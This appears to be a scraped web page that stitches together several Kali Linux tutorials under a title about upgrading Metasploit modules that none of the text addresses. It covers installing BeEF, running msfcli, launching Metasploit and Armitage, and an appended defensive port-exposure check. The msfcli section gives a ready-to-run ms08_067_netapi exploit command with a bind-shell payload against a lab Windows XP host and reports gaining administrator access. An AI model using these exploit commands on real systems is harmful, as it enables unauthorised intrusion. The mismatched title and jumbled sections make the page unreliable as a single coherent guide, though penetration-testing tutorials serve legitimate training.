How to upgrade Metasploit modules on Kali (tutorial)

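Kali Linux Tutorial Series: Installing BeEF and Integrating It with Metasploit
1.1 apt-get installation method
1.3 Basic test
1.4 Error messages
1.5 Installing BeEF from source
1.5.1 Installing curl and git
1.5.2 Installing rvm
1.5.3 Installing dependencies
1.5.4 Installing ruby
1.5.5 Installing bundler
1.5.6 Downloading beef
1.5.7 Installing and starting
1.6 Integrating metasploit
1.1 apt-get installation method
Open a terminal and enter the following command:
apt-get install beef-
Change to the BeEF installation directory.
Start beef.
root@kali:/usr/share/beef-# ./beef
Output: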
[18:46:50][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[18:46:50][*] Browser Exploitation Framework (BeEF) 0.4.4.9-alpha
[18:46:50]    |   Twit: @beefproject
[18:46:50]    |   Site:
[18:46:50]    |   Blog:
[18:46:50]    |_  Wiki: /beefproject/beef/wiki
[18:46:50][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[18:46:51][*] BeEF is loading. Wait a few seconds...
[18:46:55][*] 10 extensions enabled.
[18:46:55][*] 196 modules enabled.
[18:46:55][*] 2 network interfaces were detected.
[18:46:55][+] running on network interface: 127.0.0.1
[18:46:55]    |   Hook URL: http://127.0.0.1:3000/hook.js
[18:46:55]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[18:46:55][+] running on network interface: 192.168.14.132
[18:46:55]    |   Hook URL: http://192.168.14.132:3000/hook.js
[18:46:55]    |_  UI URL:   http://192.168.14.132:3000/ui/panel
[18:46:55][*] RESTful API key: e46ed3a91a9cdfec12cf4b83d43ecb
[18:46:55][*] HTTP Proxy: http://127.0.0.1:6789
[18:46:55][*] BeEF server started (press control+c to stop)
Playing with Metasploit Series (Part 3)
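Metasploit provides a variety of interfaces, and each of them has its own strengths and weaknesses. Below, I explain and experiment with all of the interfaces in Metasploit. Metasploit also provides exploits, payloads and so on, and uses a database for scanning. Besides reading the official Metasploit documentation, I also read comments from other users and tested each of them, to make sure this article is correct.
How Msfcli works
The msfcli interface lets the user run an exploit directly, without starting msfconsole. It can quickly launch an attack against a given operating system, which makes it suitable for batch operations or penetration testing. It has a few commonly used parameters.
-h  show help
S   show module information
P   available payloads
T   attack targets
E   start execution
Normally, you open a terminal window and type msfcli -h to see the msfcli help. But I ran into a special case when I did this. The message roughly says that msfcli has been deprecated by the official Metasploit team, who recommend using msfconsole directly. Msfcli will be removed by the official Metasploit team on … . It can still be used, though, so there is no need to worry about it.
Here is an article that explains the parameters listed by -h.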
Mode           Description
----           -----------
(A)dvanced     Show available advanced options for this module       # show this module's advanced options
(AC)tions      Show available actions for this module                # show this module's detailed action options
(C)heck        Run the check routine of the selected module          # run the check of the selected module
(E)xecute      Execute the selected module                           # execute the selected module
(H)elp         You're looking at it baby!                            # show the msfcli help
(I)DS Evasion  Show available ids evasion options for this module    # show this module's IDS evasion options
(M)issing      Show empty required options for this module           # see which required options have not been set
(O)ptions      Show available options for this module                # view the available options
(P)ayloads     Show available payloads for this module               # view the payloads available to the module
(S)ummary      Show information about this module                    # show detailed information about this module
(T)argets      Show available targets for this exploit module        # show the target types this exploit module applies to
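Now let's go through the main parameters. Please look at my screenshots, because all of the command examples are in them.
S is the capitalized first letter of "show". This parameter is generally used to show information about an exploit module.
O is the capitalized first letter of "option". Its main purpose is to view the exploit module's detailed options and their descriptions.
P is the capitalized first letter of "payload". Its main purpose is to list which payloads this exploit module can use.
T shows the types that can be attacked. For example, if this module uses this payload, which systems can it actually attack? T shows the system types that can be attacked.
Pay attention here! The O parameter in msfcli gives different results depending on where it is placed. Placed before a payload is selected, O shows the exploit's options. If you add O after selecting a payload, you get the options of both the payload and the exploit. My advice is to use O after selecting the payload, to avoid extra work.
E is the capitalized first letter of "exploit" and means execute. All that remains is to set the options obtained with O and choose the option obtained with T, then add E at the end and press Enter.
Below I demonstrate a practical case to show whether the parameters above work.
Msfcli in practice
I have configured an unpatched XP system on …; the system version is SP3 and the language is English. I plan to use the ms08_067_netapi exploit module against this XP system.
View detailed information about the ms08_067_netapi module
First start Kali and open a terminal. Enter the following command to view the module's detailed information.
msfcli windows/smb/ms08_067_netapi S
Notice that this detailed information already includes the exploit module's options and target information, and even payload information. The payload information is incomplete, though, so I still need the payload names and the payload options.
View the payloads that ms08_067_netapi can load
Continue by entering the following command in the terminal:
msfcli windows/smb/ms08_067_netapi P
This lists the names of the payloads this exploit module can load, together with their descriptions. I decided to use the windows/shell/bind_tcp payload.
Because the S output already listed the targets, I will not use the T parameter next, and instead go straight to viewing the payload's options.
msfcli windows/smb/ms08_067_netapi payload=windows/shell/bind_tcp target=0 O
Everything is ready! Now just fill in the payload settings, add E, and press Enter to successfully penetrate that XP system. The IP address of the XP system is 192.168.117.128. We only need the payload's options.
After entering the following command you get administrator privileges on the XP system
msfcli windows/smb/ms08_067_netapi payload=windows/shell/bind_tcp target=0 RHOST=192.168.117.128 LPORT=4444 E
Successfully penetrated the XP system.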
How to run metasploit and armitage on Kali Linux
Metasploit
Metasploit, the great exploitation tool, is included in Kali Linux along with its powerful frontend Armitage. Both are easy to run by clicking from the Kali Linux menu. This post shows the steps, in case you are new to it.
Metasploit has a command line interface called msfconsole, and a web interface too. To run msfconsole or armitage, first start the metasploit pro service. To do that, click the menu option Kali Linux > System Services > Metasploit > community / pro start. This starts the Metasploit web and RPC servers and also sets up the database and its users when running for the first time.
The output would look something like this.
[ ok ] Starting PostgreSQL 9.1 database server: main.
Configuring Metasploit...
Creating metasploit database user 'msf3'...
Creating metasploit database 'msf3'...
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
root@kali:~#
On the first run, it configures Metasploit by creating the database and its users. From the next run onwards, it just starts the PostgreSQL server and the Metasploit server.
So remember to start the metasploit pro service every time before using msfconsole or armitage.
The database credentials are stored in the following file
/opt/metasploit/apps/pro/ui/config/database.yml
Launch msfconsole
Now start msfconsole by typing it in the terminal.
root@kali:~# msfconsole
+-------------------------------------------------------+
METASPLOIT by Rapid7
+---------------------------+---------------------------+
__________________
==c(______(o(______(_()
| |""""""""""""|======[***
| |_____________\_______
| |==[msf >]============\
| |______________________\
// RECON \\
| \(@)(@)(@)(@)(@)(@)(@)/
*********************
+---------------------------+---------------------------+
\'\/\/\/'/
| |^^^^^^^^^^^^^^|l___
|""\___, |
| |________________|__|)__| |
| |(@)(@)"""**|(@)(@)**|(@) |
= = = = = = = = = = = =
'--------------'
+---------------------------+---------------------------+
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- type 'go_pro' to launch it now.
=[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1068 exploits - 670 auxiliary - 179 post
+ -- --=[ 277 payloads - 29 encoders - 8 nops
Check the database status by running 'db_status'.
msf > db_status
[*] postgresql connected to msf3
Now that Metasploit is connected to the database, searches of all kinds should be fast.
Metasploit web interface
Metasploit also has a web interface, which runs on port 3790. It can be accessed at the following URL
The web interface requires you to register on metasploit website and get a product/license key. Two editions of the license are currently available, community and pro.
Armitage is a Java-based GUI frontend to Metasploit that has a bunch of additional features too. Now that the Metasploit service is running, it's easy to launch Armitage as well. Just click from the menu Kali Linux > Exploitation Tools > Network Exploitation > armitage.
Or just type armitage in the terminal and hit enter.
It will pop up a dialog box asking for the connection credentials. You do not need to change anything here unless you have configured things differently. Just click 'Connect'.
Next it would ask to start Metasploit RPC server. Click 'Yes'. The metasploit rpc server starts on port number 55553. Then a progress box would come up which will take a little bit of time, so just wait. Within a minute or two, armitage would start and the window would come up.
Make sure to first start metasploit pro service, because it starts postgresql database server. Without it armitage would not start.
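An added example, not from the original post: a POSIX shell check that flags the services named on this page when they listen on a non-loopback address, and tests whether the database credentials file is readable by other users. The port list comes from the outputs on this page (2000, 3000 and 6789 for BeEF; 3790 and 55553 for Metasploit); the `ss` lines are constructed sample input and the function names are hypothetical.

```shell
#!/bin/sh
# Added example, not from the original page. Function names are hypothetical.
# Ports taken from the outputs shown on this page:
#   BeEF: 2000 (bind socket), 3000 (hook/UI), 6789 (HTTP proxy)
#   Metasploit: 3790 (web interface), 55553 (RPC server)
WATCHED_PORTS="2000 3000 3790 6789 55553"

# Reads `ss -ltn` style lines on stdin and prints "port address" for every
# watched port that listens on something other than loopback.
exposed_listeners() {
  awk -v ports="$WATCHED_PORTS" '
    BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) watch[p[i]] = 1 }
    $1 == "LISTEN" {
      idx = match($4, /:[0-9]+$/)        # last colon separates address and port
      if (idx == 0) next
      addr = substr($4, 1, idx - 1)
      port = substr($4, idx + 1)
      if (!(port in watch)) next
      if (addr ~ /^127\./ || addr == "[::1]") next   # loopback only: not exposed
      print port, addr
    }'
}

# Succeeds (exit 0) when the file at $1 is readable by "other" users.
world_readable() {
  [ -n "$(find "$1" -prune -perm -004 2>/dev/null)" ]
}

# Constructed sample input in `ss -ltn` format (not captured from a real host).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.1:6789 0.0.0.0:*
LISTEN 0 128 0.0.0.0:3000 0.0.0.0:*
LISTEN 0 128 0.0.0.0:2000 0.0.0.0:*
LISTEN 0 50 *:3790 *:*
LISTEN 0 50 [::1]:55553 [::]:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*'

printf '%s\n' "$SAMPLE_SS" | exposed_listeners
# On a live host: ss -ltn | exposed_listeners
# and: world_readable /opt/metasploit/apps/pro/ui/config/database.yml && echo "tighten permissions"
```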
About Silver Moon
Php developer, blogger and Linux enthusiast.
Copyright © 2016 BinaryTides
